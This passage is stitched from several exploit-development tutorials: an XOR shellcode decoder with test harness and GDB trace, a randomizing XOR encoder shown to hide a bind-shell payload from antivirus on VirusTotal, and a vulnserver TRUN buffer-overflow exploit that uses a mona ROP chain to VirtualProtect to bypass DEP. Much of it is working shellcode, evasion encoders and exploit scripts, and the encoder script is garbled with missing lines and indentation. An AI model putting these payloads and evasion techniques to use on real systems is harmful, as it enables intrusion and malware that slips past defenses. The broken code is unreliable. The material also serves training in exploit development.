process until it reaches the “marker”.
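I used a marker of 0xAA to note the end of the payload. When the decoder XORs this byte with
0xAA the result is zero, which sets the zero flag and ends the loop. The application will exit
before it attempts to execute this null-byte, and it isn’t an actual null in our compiled
shellcode, since we’ve encoded the byte.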
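Here is a Python model of that decode loop, run against the encoded bytes from the decoder listing in this post. It mirrors the xor / jz / inc sequence one byte at a time; `decode_until_marker` is a made-up name, and the bounds check is an addition for safety that the real stub does not have.

```python
def decode_until_marker(buffer: bytearray, key: int = 0xAA) -> int:
    """Decode in place and return the offset where the marker was found."""
    for index in range(len(buffer)):
        buffer[index] ^= key          # xor byte [esi], 0xAA
        if buffer[index] == 0:        # jz: the marker decoded to 0x00
            return index
        # otherwise: inc esi, jump back to the xor
    raise ValueError("no marker byte found")


encoded = bytearray.fromhex(
    "9b6afac2" "8585d9c2" "c285c8c3" "c42349fa" "2348f923" "4b1aa167" "2aaa"
)
length = decode_until_marker(encoded)

print(length)
print(bytes(encoded[:length]).hex())
```

One consequence of this design is that the unencoded shellcode must not contain a null byte itself: 0x00 would be encoded to 0xAA, and the decoder would treat it as the marker and stop early.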
; Filename: xor_decoder_marker.nasm
; Website: https://www.doyler.net
global _start
section .text
_start:
    ; JMP-CALL-POP: jump to the call so that the address of Shellcode gets pushed
    jmp short call_decoder
decoder:
    ; Move the pointer to the encoded Shellcode into ESI off of the stack
    pop esi
decode:
    ; XOR the byte pointed to by ESI by 0xAA - this was the value chosen during encoding, but can be modified
    xor byte [esi], 0xAA
    ; This is utilized to mark the end of the shellcode, so that a length variable is not needed
    jz Shellcode
    inc esi
    jmp short decode
call_decoder:
    call decoder
    Shellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa
Next, I used the one-liner to extract the shellcode, add it to my wrapper, and then compiled it.
"\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85"
"\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a\xaa"
doyler@slae:~/slae/module2-7$ vi shellcode.c
Finally, I executed the application to make sure that it worked. In this case, I’m just reusing
Vivek’s execve (/bin/sh) shellcode from an earlier chapter.
doyler@slae:~/slae/module2-7$ ./shellcode
Shellcode Length: 42
$ exit
Tracing Execution
I also used GDB to trace the program’s execution, and watch the decoder at work.
Breakpoint 1 at 0x80483e8
(gdb) r
$1 = 0x804a040
Breakpoint 2 at 0x804a040
(gdb) disassemble
(gdb) c
Continuing.
Shellcode Length: 42
(gdb) disassemble
0x804a050 <code+16>: 0x9b 0x6a 0xfa 0xc2 0x85 0x85 0xd9 0xc2
0x804a058 <code+24>: 0xc2 0x85 0xc8 0xc3 0xc4 0x23 0x49 0xfa
0x804a060 <code+32>: 0x23 0x48 0xf9 0x23 0x4b 0x1a 0xa1 0x67
0x804a068 <code+40>: 0x2a 0xaa 0x00 0x00 0x00 0x00 0x00 0x00
0x804a070 <dtor_idx.6161>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
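#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x85"
"\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a\xaa";

int main(void)
{
    printf("Shellcode Length: %d\n", (int)strlen((char *)code));
    int (*ret)() = (int (*)())code;
    ret();
}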
After stepping a few times, we can see that the decoder is doing its job, and the original
shellcode is starting to return.
(gdb) stepi
0x0804a046 in code ()
Finally, after a few more loops, the shellcode matches our un-encoded version!
(gdb)
0x0804a046 in code ()
Breakpoint 3 at 0x804a050
(gdb) c
Continuing.
; Filename: execve-stack.nasm
; Website: http://securitytube.net
; Training: http://securitytube-training.com
; Purpose:
global _start
section .text
_start:
    xor eax, eax        ; EAX = 0 (string terminator and NULL pointer)
    push eax
    push 0x68732f2f     ; "//sh"
    push 0x6e69622f     ; "/bin"
    mov ebx, esp        ; EBX -> "/bin//sh"
    push eax
    mov edx, esp        ; EDX -> NULL (envp)
    push ebx
    mov ecx, esp        ; ECX -> argv
    mov al, 11          ; execve
    int 0x80
(gdb) exit
(gdb) quit
Quit anyway? (y or n) y
This encoder was pretty fun, and definitely lowered the detection rate on my execve payload.
You can find the code, and any updates, in my GitHub repository.
I apologize for my naming conventions being all over the place. I’ve been switching between
underscores and dashes almost every exercise. This is something that I’d love to clean up in
the future, but feel free to submit a pull request.
I was going to include a NOT encoder in this post as well. That said, after brushing up on my
bitwise operations, I realized that NOT is the same as (and actually slower than) XOR 0xFF.
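The equivalence between NOT and XOR 0xFF is easy to confirm exhaustively for single bytes. This
Python 3 check is only a sanity test of the bitwise identity (it says nothing about instruction
timing); the helper names not_byte and xor_ff are made up for the example.

```python
def not_byte(value):
    """Bitwise NOT, masked back to a single byte."""
    return ~value & 0xFF


def xor_ff(value):
    """XOR with 0xFF, which flips every bit of the byte."""
    return value ^ 0xFF


same = all(not_byte(b) == xor_ff(b) for b in range(256))
print(same)
```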
The unencoded shellcode is split into 2 byte chunks, and for each chunk, a byte is generated to
XOR them with. Once a valid byte has been found, it is prepended to the chunk and then both
bytes are XORd using it.
In my previous posts as part of the SLAE assignments, I have explained the code in sequential
chunks. As the decoder uses a number of jumps and does not have a linear execution pattern,
see first the final code below:
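global _start
section .text
_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov dl, 0x45                  ; EOF delimiter
        jmp short call_decoder
decoder:
        pop esi                       ; $esi: shellcode
        lea edi, [esi]                ; $edi: write pointer
decode:
        mov bl, byte [edi + ecx]      ; XOR byte of the current chunk
        mov bh, bl
        mov al, dl
        xor al, bl
        jz short shellcode            ; EOF delimiter reached
        mov ax, word [edi + 1 + ecx]
        xor ax, bx
        mov word [edi], ax
        ; advance both values so the next chunk is read from the correct offsets.
        inc ecx
        lea edi, [edi + 2]
        jmp short decode
call_decoder:
        call decoder
shellcode:                            ; encoded payload bytes follow here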
The initial code that will be executed is found under the _start label. As has been seen in the
previous SLAE posts, it first XORs the registers that need to be cleared with themselves, to
ensure they are filled with 0:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
After the registers have been cleared, the value 0x45 is stored in $dl. This value is used as an
end-of-file (EOF) delimiter. It is required because, when we process the shellcode later in the
program, we need to know at which point to stop processing it; otherwise it would loop
indefinitely:
mov dl, 0x45
After setting up the EOF delimiter, execution is passed to the instruction following
the call_decoder label:
jmp short call_decoder
This instantly calls decoder, which results in the address of shellcode being pushed on to the
stack.
When using the call instruction, the address of the next instruction is pushed on to the stack so
the program knows where to return execution to once the function has finished executing.
call decoder
The decoder function does not do much other than pop the address of the shellcode off the
stack and into $esi and then load the same address into $edi:
pop esi
lea edi, [esi]
After running decoder, execution drops into the decode function; which is the main loop of the
decoder.
As the encoded payload is split into chunks of 3 bytes, which start with the byte used to XOR
the subsequent word, it first needs to create a word built from the XOR byte.
The combination of $edi + $ecx will always point to the start of the next chunk that needs to
be processed. Loading the byte at the address of these two registers summed together will give
us the XOR byte, which is then copied into $bh so that $bx holds it twice:
mov bl, byte [edi + ecx]
mov bh, bl
Before continuing, the decoder now needs to verify that the current byte that is being
processed is not the EOF delimiter.
To do this, the EOF delimiter stored in $dl is moved into $al and is then XORd with the
current byte that was just moved into $bl.
If the zero flag is set following this operation, it means the two bytes matched, and we have
finished decoding the payload. In this scenario, a jump is made to the shellcode label, where
the payload will then be executed:
mov al, dl
xor al, bl
jz short shellcode
If the jump wasn’t taken, then we have another chunk to process. As a word has been built in
the $bx register containing the XOR bytes, the word starting at the next byte after the current
pointer is loaded into $ax and then XORd with $bx:
mov ax, word [edi + 1 + ecx]
xor ax, bx
As the XOR byte that was prepended to the current chunk does not belong to the decoded
payload, it now needs to be removed. To do this, we move the decoded word in $ax to the
address pointed to by $edi (i.e. where the XOR byte currently resides):
mov word [edi], ax
Now that the chunk has been successfully decoded and the XOR byte has been overwritten,
the next chunk can be processed.
As mentioned when XORing the current word, the position of the current chunk is determined
by combining $edi and $ecx. The reason for this is due to an odd number of bytes being
contained within each chunk and the shifting that occurs.
This means, every time a chunk is processed, $edi alone would fall one place behind where the
start of the next chunk is. To work around this, $ecx is incremented by 1 each time a chunk is
processed, and as a result allows the decoder to keep track of where the next chunk is located.
With this in mind, the final step of the decode loop is to increment $ecx, move $edi forward by
2 bytes (to place it at the byte after the word that was just decoded) and then jump
to decode once more to process the next chunk:
inc ecx
lea edi, [edi + 2]
jmp short decode
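The pointer arithmetic of the decode loop can be checked with a small model. This Python 3 sketch
is a simulation under stated assumptions, not the author's code: a bytearray stands in for the
memory at $esi, the variables edi and ecx play the roles of the registers, and the sample buffer
is hand-built from two chunks with arbitrary keys 0x11 and 0x22.

```python
def decode_in_place(buf, eof):
    """Model the decode loop; mem stands in for the memory at $esi/$edi."""
    mem = bytearray(buf)
    edi = 0  # write pointer (offset of the next decoded word)
    ecx = 0  # number of chunks processed so far
    while True:
        key = mem[edi + ecx]              # mov bl, [edi + ecx]
        if key == eof:                    # xor al, bl / jz short shellcode
            break
        # mov ax, [edi + ecx + 1] / xor ax, bx / mov [edi], ax
        mem[edi] = mem[edi + ecx + 1] ^ key
        mem[edi + 1] = mem[edi + ecx + 2] ^ key
        ecx += 1                          # inc ecx
        edi += 2                          # lea edi, [edi + 2]
    return bytes(mem[:edi])


# Two chunks (keys 0x11 and 0x22) followed by the EOF delimiter 0x45.
sample = bytes([0x11, 0x31 ^ 0x11, 0xC0 ^ 0x11,
                0x22, 0x50 ^ 0x22, 0x68 ^ 0x22,
                0x45])
print(decode_in_place(sample, 0x45).hex())
```

Because each chunk shrinks from three bytes to two, the read position (edi + ecx) pulls ahead of
the write position (edi) by one byte per chunk, which is exactly what the extra counter tracks.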
Rather than manually selecting a XOR byte for each chunk, a valid EOF delimiter byte and then
processing each word in the unencoded shellcode - I have created a small Python script which
will automate all these tasks.
When selecting the XOR byte to use for each chunk, it will randomise the order in which it
checks the 254 byte range, meaning that encoding the same payload twice will likely not
produce the same output twice.
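As a compact illustration of the scheme, the following Python 3 sketch encodes a payload in
two-byte chunks with a randomly chosen key per chunk. It is a simplified stand-in, independent of
the original script: it omits the decoder stub, pads odd-length payloads with a NOP (an assumption
of this example), and picks the EOF delimiter only with respect to the encoded body. The function
names are hypothetical.

```python
import random


def find_xor_byte(chunk, bad_chars):
    """Return a random valid key for chunk, or None if no candidate works."""
    for candidate in random.sample(range(1, 256), 255):
        if candidate in bad_chars:
            continue  # the key itself is stored in the payload
        if candidate in chunk:
            continue  # XORing a byte with itself would yield a null byte
        if any((b ^ candidate) in bad_chars for b in chunk):
            continue  # an encoded byte would be a bad char
        return candidate
    return None


def encode(payload, bad_chars=b"\x00\x0a\x0d"):
    """Return (encoded bytes ending in the EOF delimiter, EOF delimiter)."""
    if len(payload) % 2:
        payload += b"\x90"  # assumption: pad odd payloads with a NOP
    body = bytearray()
    for i in range(0, len(payload), 2):
        chunk = payload[i:i + 2]
        key = find_xor_byte(chunk, bad_chars)
        if key is None:
            raise ValueError("no valid XOR byte for chunk %d" % (i // 2))
        body.append(key)
        body.extend(b ^ key for b in chunk)
    # EOF delimiter: a byte that is not bad and does not appear in the body.
    eof = next(b for b in range(1, 256)
               if b not in bad_chars and b not in body)
    return bytes(body) + bytes([eof]), eof


encoded, eof = encode(bytes.fromhex("31c050682f2f7368"))
print(encoded.hex(), hex(eof))
```

Running it twice will usually print different encodings of the same payload, since the candidate
keys are tried in a random order.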
import random
import struct
import sys
decoder_stub = '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
decoder_stub += '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a'
decoder_stub += '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8'
decoder_stub += '\x74\x16\x66\x8b\x44\x0f\x01\x66'
decoder_stub += '\x31\xd8\x66\x89\x07\x41\x8d\x7f'
decoder_stub += '\x02\xeb\xe4\xe8\xdc\xff\xff\xff'
matched_a_byte = False
# Check if the potential XOR byte matches any of the bad chars.
for byte in bad_chars:
if i == int(byte.encode('hex'), 16):
matched_a_byte = True
break
if i == int(byte.encode('hex'), 16):
matched_a_byte = True
break
matched_a_byte = True
break
if matched_a_byte:
break
if not matched_a_byte:
return i
if len(sys.argv) < 2:
exit(1)
bad_chars = '\x0a\x00\x0d'
if len(sys.argv) > 2:
encoded = []
chunk_no = 0
# Issue a warning if any of the bad chars are found within the decoder itself.
stub_has_bad_char = False
if char == byte:
stub_has_bad_char = True
break
if stub_has_bad_char:
break
if stub_has_bad_char:
print '\033[93m[!]\033[00m One or more bad chars were found in the decoder stub\n'
# Loop through the shellcode in 2 byte chunks and find a byte to XOR them
# with, each time prepending the XOR byte to the encoded chunk.
chunk_no += 1
xor_byte = 0
chunk = shellcode[0:2]
xor_byte = find_valid_xor_byte(chunk, bad_chars)
if xor_byte == 0:
exit(2)
encoded.append(struct.pack('B', xor_byte))
if i < len(chunk):
else:
encoded.append(struct.pack('B', xor_byte))
shellcode = shellcode[2::]
# Find a byte that does not appear in the decoder stub or the encoded
if xor_byte == 0:
exit(3)
encoded.append(struct.pack('B', xor_byte))
# Join the decoder and encoded payload together and output to screen.
print final_shellcode
Testing The Encoder
To test the encoder, I used an execve shellcode, which will spawn a /bin/sh shell:
$ python xorfuscator.py
'\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x5
6\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x4
2\x42\x42\x43\x43\x43\x43'
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb2\x8c\xeb\x1f\x5e\x8d\x3e\x8a\x1c\x0f\x88\xdf\x88\x
d0\x30\xd8\x74\x16\x66\x8b\x44\x0f\x01\x66\x31\xd8\x66\x89\x07\x41\x8d\x7f\x02\xeb\x
e4\xe8\xdc\xff\xff\xff\x85\x6e\x9f\x12\x4c\x23\x71\xaa\xf9\xb5\xeb\xb2\x25\xac\x53\x76\x
7e\xff\xd3\x8d\xdf\x4c\xc1\x52\x7f\xf2\x31\x3b\x33\xb6\xad\xfb\xa1\x1a\x2b\xda\xf2\x42\
xf9\x52\x9f\xd2\x99\x71\x78\x1c\xe3\xe3\x44\xbb\x6b\x78\x1a\x11\xe5\x8b\xca\x32\x41\x
5a\xe8\xa9\xaa\x31\x73\x73\xe6\xa4\xa5\x37\x74\x74\x4d\x0e\x4d\x8c
I then placed this shellcode into the same C program that I have used in the other SLAE posts:
#include <stdio.h>
#include <string.h>
int main(void)
s();
return 0;
$ whoami
rastating
After finishing coding the encoder and decoder, I was curious to see how anti-viruses would
respond to it.
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\
x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\
x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x6
8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
I then placed this shellcode into the C file used to test the encoder initially, compiled it and
uploaded it to VirusTotal. The executable was successfully identified by Avast, ClamAV and
AVG as being dangerous:
$ python xorfuscator.py
'\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00
\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\
x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x6
8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb2\xa4\xeb\x1f\x5e\x8d\x3e\x8a\x1c\x0f\x88\xdf\x88\x
d0\x30\xd8\x74\x16\x66\x8b\x44\x0f\x01\x66\x31\xd8\x66\x89\x07\x41\x8d\x7f\x02\xeb\x
e4\xe8\xdc\xff\xff\xff\x7d\x4c\xa6\x09\xfe\xea\xd8\x8b\x9b\x0c\x5f\x66\x30\x32\xb9\x07\x
e6\xb7\x0f\x69\xc2\xab\x2b\xf0\x3e\x60\x6c\xea\x82\xe8\x63\x63\x72\x68\x34\x02\xeb\xf
b\xba\xef\xbf\x66\xf4\x15\x9e\xbb\xdd\xe3\x73\xbe\xf3\xbb\x32\xfa\xeb\xef\x58\x20\x24\
x90\xe3\x85\x2e\x64\xe4\x27\x59\xe9\x3f\xee\x23\x6e\x63\xf0\x3a\x47\x2d\x78\x68\x30\x
a5\x66\xe6\x2f\x69\x10\x91\xfa\x92\xd5\x3e\x11\x4d\xf4\x9c\x9c\x16\x39\x74\xa0\xc9\xce
\xd2\x5b\x31\x5c\x0c\x0f\xfb\x72\x1a\xb6\x06\xbd\xd1\x1c\x51\xa4
After encoding it, I placed the encoded shellcode into the same C file again, compiled, and
uploaded to VirusTotal once more. As expected, no anti-virus applications were able to
successfully detect the file as being dangerous:
This test illustrates how effective using a custom encoding scheme can be when attempting to
evade AV systems.
https://rastating.github.io/creating-a-custom-shellcode-encoder/
https://github.com/rastating/slae
https://docs.pwntools.com/en/stable/encoders.html
https://medium.com/syscall59/writing-a-custom-shellcode-encoder-31816e767611
DEP Bypass
Data Execution Prevention (DEP) was introduced as a protection mechanism to make parts of
memory non-executable, due to which attacks that attempt to execute instructions on the
stack will lead to exceptions. But motivated cybersecurity researchers have found ways to
bypass it.
Although Windows has other protection mechanisms to protect the system against similar
attack scenarios, it’s good for a cybersecurity enthusiast to stay up to date on the
various techniques that can be leveraged to bypass these protection mechanisms.
Pre-requisites:
Requirements:
• A vulnerable application
The easiest way to bypass DEP is using Return-Oriented Programming. It can also be used to
bypass code signing.
The main idea behind ROP is to get control of the stack to further chain together machine
instructions from the subroutines present in the memory.
This existing assembly code is referred to as gadgets. Each gadget ends with a return instruction
(RET), which transfers control to the next gadget, hence the name ROP chain.
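In an exploit script, a chain is usually nothing more than a list of 32-bit values packed one
after another. The following Python 3 sketch shows that packing step only; the three entries are
invented placeholders (not real gadget addresses), and pack_chain is a hypothetical helper name.

```python
import struct

# Hypothetical chain entries, invented for illustration only.
CHAIN = [
    0x11223344,  # e.g. address of a "POP EAX # RETN" gadget
    0x41414141,  # value that the POP would load into EAX
    0x55667788,  # e.g. address of the next gadget
]


def pack_chain(entries):
    """Pack each 32-bit entry in little-endian order, as x86 expects."""
    return b"".join(struct.pack("<I", entry) for entry in entries)


chain = pack_chain(CHAIN)
print(len(chain), chain.hex())
```

Each RET pops the next four bytes of this buffer into EIP, which is how one gadget hands control
to the one after it.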
We can chain together the gadgets to develop our shellcode but that would take a lot of time
and effort, so the smart way is to either disable DEP in runtime or allocate some space in the
memory not protected by execution prevention wherein we can put our shellcode.
Since we are executing instructions already available in the system memory, the initial
requirement is to be familiar with the APIs in Windows that can be leveraged to bypass DEP.
The table below lists the APIs and their functionality that can be used to achieve this:
A ROP chain can be developed to use any of the above functions given it is available for the
Windows version of the victim machine.
Sounds complicated right? It’s not thanks to the authors of mona who have made life simpler
for the hackers and difficult for the developers.
Exploit Development
Although DEP is enabled by default, let’s check that it’s on, just to be sure.
Navigate to: Control Panel -> System and Security -> System -> Advanced System Settings
Then choose “Turn on DEP for all programs and services except those I select” if it is not
already selected.
People with experience in stack-based buffer overflow exploit development will be familiar with
these interim steps.
a.) Start the Windows testing machine, on which we will debug the vulnerable application to
tweak and develop our fully functional exploit.
b.) Make sure the vulnerable application is installed and running properly.
c.) Ensure Immunity debugger is working properly and mona.py is present in the PyCommands
folder of Immunity Debugger Application.
Now that everything is up and running let’s move on to the fun part — the exploit
development process.
The application we are using is called vulnserver, which, as the name suggests, is
vulnerable.
In vulnserver, the TRUN command has been found to be vulnerable to a stack-based buffer
overflow, which in layman’s terms means that the application will crash when an input string
longer than the application can handle is sent through the TRUN command. To be a bit more
technical, since the application places no bound on the length of input that it can receive,
the memory space (buffer) and the saved return address that is loaded into EIP (the instruction
pointer) get overwritten.
To verify this, let’s send a string of, say, 3000 characters from the attacker machine to the
application to ensure that it is vulnerable:
#!/usr/bin/python
import socket,sys
host="192.168.2.135"
port=9999
On attaching the application to Immunity Debugger and running the same script, we can see
that the EIP is overwritten with four 41s (EIP is four bytes wide), which is hex for A.
We aim to get control of the EIP and point it to a location where our shellcode resides.
For that, we need to find the length of the string (the offset) after which the EIP is overwritten.
Run the following command in a Kali terminal to generate a unique pattern string of length 3000:
/usr/share/metasploit-framework/tools/pattern_create.rb -l 3000
Now, instead of the AAAs that we were sending to crash the application, we are going to send
this random string of same length and find out the character being written in EIP.
We restart the application from Immunity Debugger (Debugger->Restart) and run the below
script from the attacker machine.
#!/usr/bin/python
import socket
server = '192.168.43.200'
sport = 9999
prefix = 'Aa0Aa1Aa……………………Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9'
attack = prefix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
The application will crash again but this time EIP will be overwritten with a part of the random
string that we sent from the attacker machine.
b.) Again we will use metasploit to figure out the exact offset.
Replace the text highlighted in yellow with whatever characters EIP was overwritten with.
The output will tell us the offset enabling us to write whatever we wish to in the EIP.
For vulnserver it came out to be 2006. This means that after 2006 characters the next four
characters overwrite the EIP.
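The idea behind the pattern and offset tools can be reproduced in a few lines. This Python 3
sketch imitates the behaviour of the Metasploit scripts rather than calling them; the
upper/lower/digit ordering is an assumption that happens to match the Aa0Aa1Aa ... Dv9 excerpt
above, and the function names are hypothetical.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern of upper/lower/digit triples (Aa0Aa1Aa2...)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length):
    """Locate the four bytes seen in EIP (given as a little-endian integer)."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


pattern = pattern_create(3000)
# Simulate a crash in which bytes 2006..2009 of the pattern landed in EIP.
eip = struct.unpack("<I", pattern[2006:2010].encode("ascii"))[0]
print(pattern[:12], hex(eip), pattern_offset(eip, 3000))
```

The debugger shows EIP as a number, so the four pattern characters appear byte-reversed there;
packing the value with "<I" undoes that before searching.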
Now the payload which we will send on to the victim will be similar to that of buffer overflow.
For example on sending the payload as mentioned above EIP will be overwritten with four
Bs(\x42) as seen below. The padding will ensure that payload length is 3000.
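The layout of such a proof-of-control payload can be sketched as follows. This is a Python 3
illustration using the offset and total length quoted in the text; build_payload and the choice of
"C" as the padding byte are assumptions of the example.

```python
OFFSET = 2006        # bytes before the saved return address (from the text)
TOTAL_LENGTH = 3000  # overall payload length used in this section


def build_payload(eip_bytes):
    """Filler up to the offset, four bytes for EIP, then padding to 3000."""
    prefix = b"A" * OFFSET
    padding = b"C" * (TOTAL_LENGTH - len(prefix) - len(eip_bytes))
    return prefix + eip_bytes + padding


payload = build_payload(b"B" * 4)
print(len(payload), payload[OFFSET:OFFSET + 4])
```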
Now that we have control of EIP we point it to the address of whatever instruction that we
want to execute next. For a normal Buffer Overflow the EIP would have pointed to a JUMP
instruction that will further jump to our shellcode present in the stack giving us a shell back
from the victim system.
But with DEP turned on, whenever the exploit tries to execute some instruction in the stack an
access violation occurs, so the normal Buffer Overflow exploit is useless for now.
Though the whole ROP concept sounds overwhelming at first, the actual execution process is
not difficult.
We just need to run the following command from the Immunity Debugger instruction bar.
We are going to use the python code for VirtualProtect() from rop_chains.txt and exploit.
But before moving on with our ready to use code let’s pause and try to understand what
exactly is happening.
VirtualProtect() will turn off DEP for a part of memory, so the code placed in that part of the
memory can execute. Its arguments are:
• lpAddress: Points to the region for which DEP has to be turned off; this will be the base
address of the shellcode on the stack.
• dwSize: Size of the region for which DEP has to be turned off.
• flNewProtect: The new memory protection constant to apply to the region.
• lpflOldProtect: Points to a variable that will receive the previous access protection
value.
Now ROP gadgets will be used to develop the above mentioned arguments that
VirtualProtect() needs, set the values as required and execute the function.
Let’s have a look at the ROP function generated by mona and try to understand how it works.
Lines 11,12,13,14: dwSize of 0x201 was put in EAX and then transferred to EBX.
Lines 15,16,17,18: The memory protection constant 0x40 (PAGE_EXECUTE_READWRITE) was put in
EAX, then transferred to EDX for flNewProtect.
Lines 19,20: A pointer to a writable location has been set in ECX for lpflOldProtect.
Lines 7,8 and 21,22: ESI and EDI were populated for the PUSHAD call to execute.
Lines 23,24,25: A PUSHAD instruction is executed at the end, which pushes all the values that
were put in the registers onto the stack.
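Why the registers are loaded this way becomes clearer once the PUSHAD push order is written out.
The Python 3 sketch below lists the stack from the new top upward after PUSHAD; the push order is
the documented x86 behaviour, while the role assigned to each register follows the usual layout of
a mona-style VirtualProtect() chain and should be read as an assumption, since the generated chain
itself is not reproduced in these notes.

```python
# PUSHAD pushes the registers in this order, so the first one ends up at the
# highest address and the last one (EDI) at the new top of the stack.
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


def stack_after_pushad(registers):
    """Return (name, value) pairs from the new top of the stack upward."""
    return [(name, registers[name]) for name in reversed(PUSHAD_ORDER)]


# Assumed roles for a VirtualProtect() chain (descriptions, not real values).
registers = {
    "EDI": "pointer to a RETN gadget (ROP NOP)",
    "ESI": "pointer to VirtualProtect()",
    "EBP": "return address after the call (e.g. a JMP ESP gadget)",
    "ESP": "lpAddress (stack address, filled in automatically)",
    "EBX": "dwSize (0x201)",
    "EDX": "flNewProtect (0x40)",
    "ECX": "lpflOldProtect (writable address)",
    "EAX": "0x90909090 (NOPs)",
}

for name, role in stack_after_pushad(registers):
    print(name, "->", role)
```

Read from the top, the stack then holds a RETN, the function pointer, a return address and the
four arguments in calling order, which is the frame VirtualProtect() expects.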
Now that our code is ready, let’s try to execute some malicious code on the victim machine.
We place the malicious code along with the ROP chain in our exploit.
As seen in the code below, we first set calc to a malicious code that will open up a calculator.
This is followed by the declaration of the ROP function generated by mona. Then we call the
create_rop_chain function, remove bad characters (\x00 for vulnserver) and store the result in
the variable rop_chain.
Now that we have declared all the important stuff we just need to piece together our payload
and send it to the victim machine. Which we are doing in the following lines:
padding = 'F' * (3000 - 2006 - 16 - len(shellcode))
attack = prefix + rop_chain + nops + calc + padding
Our prefix is A*2006, so the EIP will be pointing to the ROP chain code. The ROP chain code will
execute the VirtualProtect() API, which in turn will mark the stack memory holding our malicious
code as executable, turning DEP off for that region.
Then we append our malicious code, preceded by nops, and add padding at the end to ensure that
the payload length is 3000.
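One way to keep the total at exactly 3000 bytes is to derive the padding from the lengths of all
the other parts. The following Python 3 sketch shows that bookkeeping with placeholder data; the
function build_dep_payload, the 100-byte stand-in chain and the INT3 stand-in shellcode are all
assumptions of this example, not the values used in the original exploit.

```python
OFFSET = 2006        # filler length before the ROP chain (from the text)
TOTAL_LENGTH = 3000  # overall payload length used in this section


def build_dep_payload(rop_chain, shellcode, nop_count=16):
    """Assemble prefix + ROP chain + NOPs + shellcode + padding."""
    prefix = b"A" * OFFSET
    nops = b"\x90" * nop_count
    used = len(prefix) + len(rop_chain) + len(nops) + len(shellcode)
    if used > TOTAL_LENGTH:
        raise ValueError("payload exceeds %d bytes" % TOTAL_LENGTH)
    padding = b"F" * (TOTAL_LENGTH - used)
    return prefix + rop_chain + nops + shellcode + padding


rop_chain = b"R" * 100      # placeholder for the packed gadget chain
shellcode = b"\xcc" * 200   # placeholder: INT3 breakpoints
attack = build_dep_payload(rop_chain, shellcode)
print(len(attack))
```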
Then we send out the exploit and as evident from the image below the calculator will open up
in the victim windows machine.
So, our exploit was successfully able to bypass DEP and execute commands on the victim
machine.
What next? We can even get a shell back from the victim with the privileges of the vulnerable
application thereby compromising the confidentiality, integrity and availability of the system.
Tempting enough, right? But that’s something for you to try. Just generate shellcode using
msfvenom, replace the calculator code with the freshly generated shellcode, and exploit.
References
http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html
https://samsclass.info/127/proj/rop.htm
https://docs.google.com/document/d/1L1xCLzX0EFQoRrlp_MOm-Jnkvb_2Qe2PFHqQ8Bt6oIU/edit#
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
https://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf
http://www.fuzzysecurity.com/tutorials/expDev/7.html
https://medium.com/cybersecurityservices/dep-bypass-using-rop-chains-garima-chopra-e8b3361e50ce
If you’re reading this, there’s a likelihood you are already familiar with buffer overflow
exploitation (or at least have heard of it). The gist of it is, certain programming SNAFUs can
allow an attacker to send more input to a “buffer” than the expected length of that buffer can
handle. Let’s observe a classic stack buffer overflow vulnerability:
